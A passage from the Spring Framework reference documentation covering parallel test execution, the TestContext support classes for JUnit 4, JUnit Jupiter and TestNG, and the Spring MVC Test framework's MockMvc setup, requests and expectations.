assertNumUsers(int expected) {\n\t\t\tassertEquals(expected, countRowsInTable(\"user\"),\n\t\t\t\t\"Number of rows in the [user] table.\");\n\t\t}\n\t}\n----\n\n\n[[testcontext-parallel-test-execution]]\n==== Parallel test execution\n\nSpring Framework 5.0 introduces basic support for executing tests in parallel within a\nsingle JVM when using the _Spring TestContext Framework_. In general this means that most\ntest classes or test methods can be executed in parallel without any changes to test code\nor configuration.\n\n[TIP]\n====\nFor details on how to set up parallel test execution, consult the documentation for your\ntesting framework, build tool, or IDE.\n====\n\nKeep in mind that the introduction of concurrency into your test suite can result in\nunexpected side effects, strange runtime behavior, and tests that only fail intermittently\nor seemingly randomly. The Spring Team therefore provides the following general guidelines\nfor when __not__ to execute tests in parallel.\n\n__Do not execute tests in parallel if:__\n\n* Tests make use of Spring's `@DirtiesContext` support.\n* Tests make use of JUnit 4's `@FixMethodOrder` support or any testing framework feature\n that is designed to ensure that test methods execute in a particular order. Note,\n however, that this does not apply if entire test classes are executed in parallel.\n* Tests change the state of shared services or systems such as a database, message broker,\n filesystem, etc. This applies to both in-memory and external systems.\n\n[TIP]\n====\nIf parallel test execution fails with an exception stating that the `ApplicationContext`\nfor the current test is no longer active, this typically means that the\n`ApplicationContext` was removed from the `ContextCache` in a different thread.\n\nThis may be due to the use of `@DirtiesContext` or due to automatic eviction from the\n`ContextCache`. If `@DirtiesContext` is the culprit, you will either need to find a way\nto avoid using `@DirtiesContext` or exclude such tests from parallel execution. If the\nmaximum size of the `ContextCache` has been exceeded, you can increase the maximum size\nof the cache. See the discussion on <<testcontext-ctx-management-caching,context\ncaching>> for details.\n====\n\n[WARNING]\n====\nParallel test execution in the Spring TestContext Framework is only possible if the\nunderlying `TestContext` implementation provides a _copy constructor_ as explained in the\njavadocs for `TestContext`. The `DefaultTestContext` used in Spring provides such a\nconstructor; however, if you use a third-party library that provides a custom\n`TestContext` implementation, you will need to verify if it is suitable for parallel test\nexecution.\n====\n\n[[testcontext-support-classes]]\n==== TestContext Framework support classes\n\n\n[[testcontext-junit4-runner]]\n===== Spring JUnit 4 Runner\n\nThe __Spring TestContext Framework__ offers full integration with JUnit 4 through a\ncustom runner (supported on JUnit 4.12 or higher). By annotating test classes with\n`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`\nvariant, developers can implement standard JUnit 4 based unit and integration tests and\nsimultaneously reap the benefits of the TestContext framework such as support for loading\napplication contexts, dependency injection of test instances, transactional test method\nexecution, and so on. If you would like to use the Spring TestContext Framework with an\nalternative runner such as JUnit 4's `Parameterized` or third-party runners such as the\n`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support\nfor JUnit rules>> instead.\n\nThe following code listing displays the minimal requirements for configuring a test class\nto run with the custom Spring `Runner`. `@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit 4 Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit 4's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule springClassRule = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit 4 support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit 4 based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-junit-jupiter-extension]]\n===== SpringExtension for JUnit Jupiter\n\nThe __Spring TestContext Framework__ offers full integration with the _JUnit Jupiter_\ntesting framework introduced in JUnit 5. By annotating test classes with\n`@ExtendWith(SpringExtension.class)`, developers can implement standard JUnit Jupiter\nbased unit and integration tests and simultaneously reap the benefits of the TestContext\nframework such as support for loading application contexts, dependency injection of test\ninstances, transactional test method execution, and so on.\n\nFurthermore, thanks to the rich extension API in JUnit Jupiter, Spring is able to provide\nthe following features above and beyond the feature set that Spring supports for JUnit 4\nand TestNG.\n\n* Dependency injection for test constructors, test methods, and test lifecycle callback\n methods\n - See <<testcontext-junit-jupiter-di>> for further details.\n* Powerful support for link:http:\/\/junit.org\/junit5\/docs\/current\/user-guide\/#extensions-conditions[_conditional test execution_]\n based on SpEL expressions, environment variables, system properties, etc.\n - See the documentation for `@EnabledIf` and `@DisabledIf` in\n <<integration-testing-annotations-junit-jupiter>> for further details and examples.\n* Custom _composed annotations_ that combine annotations from Spring **and** JUnit\n Jupiter.\n - See the `@TransactionalDevTestConfig` and `@TransactionalIntegrationTest` examples in\n <<integration-testing-annotations-meta>> for further details.\n\nThe following code listing demonstrates how to configure a test class to use the\n`SpringExtension` in conjunction with `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs JUnit Jupiter to extend the test with Spring support.\n@ExtendWith(SpringExtension.class)\n\/\/ Instructs Spring to load an ApplicationContext from TestConfig.class\n@ContextConfiguration(classes = TestConfig.class)\nclass SimpleTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSince annotations in JUnit 5 can also be used as meta-annotations, Spring is able to\nprovide `@SpringJUnitConfig` and `@SpringJUnitWebConfig` __composed annotations__ to\nsimplify the configuration of the test `ApplicationContext` and JUnit Jupiter.\n\nFor example, the following example uses `@SpringJUnitConfig` to reduce the amount of\nconfiguration used in the previous example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs Spring to register the SpringExtension with JUnit\n\/\/ Jupiter and load an ApplicationContext from TestConfig.class\n@SpringJUnitConfig(TestConfig.class)\nclass SimpleTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSimilarly, the following example uses `@SpringJUnitWebConfig` to create a\n`WebApplicationContext` for use with JUnit Jupiter.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs Spring to register the SpringExtension with JUnit\n\/\/ Jupiter and load a WebApplicationContext from TestWebConfig.class\n@SpringJUnitWebConfig(TestWebConfig.class)\nclass SimpleWebTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSee the documentation for `@SpringJUnitConfig` and `@SpringJUnitWebConfig` in\n<<integration-testing-annotations-junit-jupiter>> for further details.\n\n\n[[testcontext-junit-jupiter-di]]\n===== Dependency Injection with the SpringExtension\n\nThe `SpringExtension` implements the\nlink:http:\/\/junit.org\/junit5\/docs\/current\/user-guide\/#extensions-parameter-resolution[`ParameterResolver`]\nextension API from JUnit Jupiter which allows Spring to provide dependency injection for\ntest constructors, test methods, and test lifecycle callback methods.\n\nSpecifically, the `SpringExtension` is able to inject dependencies from the test's\n`ApplicationContext` into test constructors and methods annotated with `@BeforeAll`,\n`@AfterAll`, `@BeforeEach`, `@AfterEach`, `@Test`, `@RepeatedTest`, `@ParameterizedTest`,\netc.\n\n[[testcontext-junit-jupiter-di-constructor]]\n====== Constructor Injection\n\nIf a parameter in a constructor for a JUnit Jupiter test class is of type\n`ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with\n`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific\nparameter with the corresponding bean from the test's `ApplicationContext`. A test\nconstructor can also be directly annotated with `@Autowired` if all of the parameters\nshould be supplied by Spring.\n\n[WARNING]\n====\nIf the constructor for a test class is itself annotated with `@Autowired`, Spring will\nassume the responsibility for resolving **all** parameters in the constructor.\nConsequently, no other `ParameterResolver` registered with JUnit Jupiter will be able to\nresolve parameters for such a constructor.\n====\n\nIn the following example, Spring will inject the `OrderService` bean from the\n`ApplicationContext` loaded from `TestConfig.class` into the\n`OrderServiceIntegrationTests` constructor. Note as well that this feature allows test\ndependencies to be `final` and therefore _immutable_.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n private final OrderService orderService;\n\n @Autowired\n OrderServiceIntegrationTests(OrderService orderService) {\n this.orderService = orderService.\n }\n\n \/\/ tests that use the injected OrderService\n}\n----\n\n[[testcontext-junit-jupiter-di-method]]\n====== Method Injection\n\nIf a parameter in a JUnit Jupiter test method or test lifecycle callback method is of\ntype `ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with\n`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific\nparameter with the corresponding bean from the test's `ApplicationContext`.\n\nIn the following example, Spring will inject the `OrderService` from the\n`ApplicationContext` loaded from `TestConfig.class` into the `deleteOrder()` test method.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n @Test\n void deleteOrder(@Autowired OrderService orderService) {\n \/\/ use orderService from the test's ApplicationContext\n }\n}\n----\n\nDue to the robustness of the `ParameterResolver` support in JUnit Jupiter, it is also\npossible to have multiple dependencies injected into a single method not only from Spring\nbut also from JUnit Jupiter itself or other third-party extensions.\n\nThe following example demonstrates how to have both Spring and JUnit Jupiter inject\ndependencies into the `placeOrderRepeatedly()` test method simultaneously. Note that the\nuse of `@RepeatedTest` from JUnit Jupiter allows the test method to gain access to the\n`RepetitionInfo`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n @RepeatedTest(10)\n void placeOrderRepeatedly(RepetitionInfo repetitionInfo,\n @Autowired OrderService orderService) {\n\n \/\/ use orderService from the test's ApplicationContext\n \/\/ and repetitionInfo from JUnit Jupiter\n }\n}\n----\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. Here is a\nJUnit Jupiter based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\nimport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\nimport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n@SpringJUnitWebConfig(locations = \"test-servlet-context.xml\")\nclass ExampleTests {\n\n private MockMvc mockMvc;\n\n @BeforeEach\n void setup(WebApplicationContext wac) {\n this.mockMvc = MockMvcBuilders.webAppContextSetup(wac).build();\n }\n\n @Test\n void getAccount() throws Exception {\n this.mockMvc.perform(get(\"\/accounts\/1\")\n .accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n .andExpect(status().isOk())\n .andExpect(content().contentType(\"application\/json\"))\n .andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n }\n\n}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. Just check the support for code\ncompletion on static members.\n\n[[spring-mvc-test-server-setup-options]]\n===== Setup Choices\nThere are two main options for creating an instance of `MockMvc`.\nThe first is to load Spring MVC configuration through the __TestContext\nframework__, which loads the Spring configuration and injects a `WebApplicationContext`\ninto the test to use to build a `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"my-servlet-context.xml\")\n\tpublic class MyWebTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe second is to simply create a controller instance manually without loading Spring\nconfiguration. Instead basic default configuration, roughly comparable to that of\nthe MVC JavaConfig or the MVC namespace, is automatically created and can be customized\nto a degree:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWhich setup option should you use?\n\nThe __\"webAppContextSetup\"__ loads your actual Spring MVC configuration resulting in a\nmore complete integration test. Since the __TestContext framework__ caches the loaded\nSpring configuration, it helps keep tests running fast, even as you introduce more tests\nin your test suite. Furthermore, you can inject mock services into controllers through\nSpring configuration in order to remain focused on testing the web layer. Here is an\nexample of declaring a mock service with Mockito:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"org.mockito.Mockito\" factory-method=\"mock\">\n\t\t<constructor-arg value=\"org.example.AccountService\"\/>\n\t<\/bean>\n----\n\nYou can then inject the mock service into the test in order set up and verify\nexpectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class AccountTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Autowired\n\t\tprivate AccountService accountService;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe __\"standaloneSetup\"__ on the other hand is a little closer to a unit test. It tests\none controller at a time: the controller can be injected with mock dependencies manually,\nand it doesn't involve loading Spring configuration. Such tests are more focused on style\nand make it easier to see which controller is being tested, whether any specific Spring\nMVC configuration is required to work, and so on. The \"standaloneSetup\" is also a very\nconvenient way to write ad-hoc tests to verify specific behavior or to debug an issue.\n\nJust like with any \"integration vs. unit testing\" debate, there is no right or wrong\nanswer. However, using the \"standaloneSetup\" does imply the need for additional\n\"webAppContextSetup\" tests in order to verify your Spring MVC configuration.\nAlternatively, you may choose to write all tests with \"webAppContextSetup\" in order to\nalways test against your actual Spring MVC configuration.\n\n[[spring-mvc-test-server-setup-steps]]\n===== Setup Features\n\nNo matter which MockMvc builder you use all `MockMvcBuilder` implementations provide\nsome common and very useful features. For example you can declare an `Accept` header\nfor all requests and expect a status of 200 as well as a `Content-Type` header\nin all responses as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ static import of MockMvcBuilders.standaloneSetup\n\nMockMVc mockMvc = standaloneSetup(new MusicController())\n\t\t.defaultRequest(get(\"\/\").accept(MediaType.APPLICATION_JSON))\n\t\t.alwaysExpect(status().isOk())\n\t\t.alwaysExpect(content().contentType(\"application\/json;charset=UTF-8\"))\n\t\t.build();\n----\n\nIn addition 3rd party frameworks (and applications) may pre-package setup\ninstructions like the ones through a `MockMvcConfigurer`. The Spring Framework\nhas one such built-in implementation that helps to save and re-use the HTTP\nsession across requests. It can be used as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ static import of SharedHttpSessionConfigurer.sharedHttpSession\n\nMockMvc mockMvc = MockMvcBuilders.standaloneSetup(new TestController())\n .apply(sharedHttpSession())\n .build();\n\n\/\/ Use mockMvc to perform requests...\n----\n\nSee `ConfigurableMockMvcBuilder` for a list of all MockMvc builder features\nor use the IDE to explore the available options.\n\n\n\n[[spring-mvc-test-server-performing-requests]]\n===== Performing Requests\nIt's easy to perform requests using any HTTP method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/hotels\/{id}\", 42).accept(MediaType.APPLICATION_JSON));\n----\n\nYou can also perform file upload requests that internally use\n`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart\nrequest but rather you have to set it up:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(multipart(\"\/doc\").file(\"a1\", \"ABC\".getBytes(\"UTF-8\")));\n----\n\nYou can specify query parameters in URI template style:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels?foo={foo}\", \"bar\"));\n----\n\nOr you can add Servlet request parameters representing either query of form parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels\").param(\"foo\", \"bar\"));\n----\n\nIf application code relies on Servlet request parameters and doesn't check the query\nstring explicitly (as is most often the case) then it doesn't matter which option you use.\nKeep in mind however that query params provided with the URI template will be decoded while\nrequest parameters provided through the `param(...)` method are expected to already be decoded.\n\nIn most cases it's preferable to leave out the context path and the Servlet path from\nthe request URI. If you must test with the full request URI, be sure to set the\n`contextPath` and `servletPath` accordingly so that request mappings will work:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/app\/main\/hotels\/{id}\").contextPath(\"\/app\").servletPath(\"\/main\"))\n----\n\nLooking at the above example, it would be cumbersome to set the contextPath and\nservletPath with every performed request. Instead you can set up default request\nproperties:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tmockMvc = standaloneSetup(new AccountController())\n\t\t\t\t.defaultRequest(get(\"\/\")\n\t\t\t\t.contextPath(\"\/app\").servletPath(\"\/main\")\n\t\t\t\t.accept(MediaType.APPLICATION_JSON).build();\n\t\t}\n----\n\nThe above properties will affect every request performed through the `MockMvc` instance.\nIf the same property is also specified on a given request, it overrides the default value.\nThat is why the HTTP method and URI in the default request don't matter since they must be\nspecified on every request.\n\n[[spring-mvc-test-server-defining-expectations]]\n===== Defining Expectations\nExpectations can be defined by appending one or more `.andExpect(..)` calls after\nperforming a request:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/accounts\/1\")).andExpect(status().isOk());\n----\n\n`MockMvcResultMatchers.*` provides a number of expectations, some of which are further\nnested with more detailed expectations.\n\nExpectations fall in two general categories. The first category of assertions verifies\nproperties of the response: for example, the response status, headers, and content. These\nare the most important results to assert.\n\nThe second category of assertions goes beyond the response. These assertions allow\none to inspect Spring MVC specific aspects such as which controller method processed\nthe request, whether an exception was raised and handled, what the content of the model\nis, what view was selected, what flash attributes were added, and so on. They also allow\none to inspect Servlet specific aspects such as request and session attributes.\n\nThe following test asserts that binding or validation failed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nMany times when writing tests, it's useful to _dump_ the results of the performed request.\nThis can be done as follows, where `print()` is a static import from\n`MockMvcResultHandlers`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andDo(print())\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nAs long as request processing does not cause an unhandled exception, the `print()` method\nwill print all the available result data to `System.out`. Spring Framework 4.2 introduced\na `log()` method and two additional variants of the `print()` method, one that accepts\nan `OutputStream` and one that accepts a `Writer`. For example, invoking\n`print(System.err)` will print the result data to `System.err`; while invoking\n`print(myWriter)` will print the result data to a custom writer. If you would like to\nhave the result data _logged_ instead of printed, simply invoke the `log()` method which\nwill log the result data as a single `DEBUG` message under the\n`org.springframework.test.web.servlet.result` logging category.\n\nIn some cases, you may want to get direct access to the result and verify something that\ncannot be verified otherwise. This can be achieved by appending `.andReturn()` after all\nother expectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMvcResult mvcResult = mockMvc.perform(post(\"\/persons\")).andExpect(status().isOk()).andReturn();\n\t\/\/ ...\n----\n\nIf all tests repeat the same expectations you can set up common expectations once\nwhen building the `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tstandaloneSetup(new SimpleController())\n\t\t.alwaysExpect(status().isOk())\n\t\t.alwaysExpect(content().contentType(\"application\/json;charset=UTF-8\"))\n\t\t.build()\n----\n\nNote that common expectations are __always__ applied and cannot be overridden without\ncreating a separate `MockMvc` instance.\n\nWhen JSON response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using JsonPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/people\").accept(MediaType.APPLICATION_JSON))\n\t\t.andExpect(jsonPath(\"$.links[?(@.rel == 'self')].href\").value(\"http:\/\/localhost:8080\/people\"));\n----\n\nWhen XML response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using XPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMap<String, String> ns = Collections.singletonMap(\"ns\", \"http:\/\/www.w3.org\/2005\/Atom\");\n\tmockMvc.perform(get(\"\/handle\").accept(MediaType.APPLICATION_XML))\n\t\t.andExpect(xpath(\"\/person\/ns:link[@rel='self']\/@href\", ns).string(\"http:\/\/localhost:8080\/people\"));\n----\n\n[[spring-mvc-test-server-filters]]\n===== Filter Registrations\nWhen setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();\n----\n\nRegistered filters will be invoked through via the `MockFilterChain` from `spring-test`, and the\nlast filter will delegate to the `DispatcherServlet`.\n\n[[spring-mvc-test-vs-end-to-end-integration-tests]]\n===== Differences between Out-of-Container and End-to-End Integration Tests\n\nAs mentioned earlier __Spring MVC Test__ is built on the Servlet API mock objects from\nthe `spring-test` module and does not use a running Servlet container. Therefore\nthere are some important differences compared to full end-to-end integration tests\nwith an actual client and server running.\n\nThe easiest way to think about this is starting with a blank `MockHttpServletRequest`.\nWhatever you add to it is what the request will be. Things that may catch you by surprise\nare that there is no context path by default, no `jsessionid` cookie, no forwarding, error,\nor async dispatches, and therefore no actual JSP rendering. Instead, \"forwarded\" and\n\"redirected\" URLs are saved in the `MockHttpServletResponse` and can be asserted with\nexpectations.\n\nThis means if 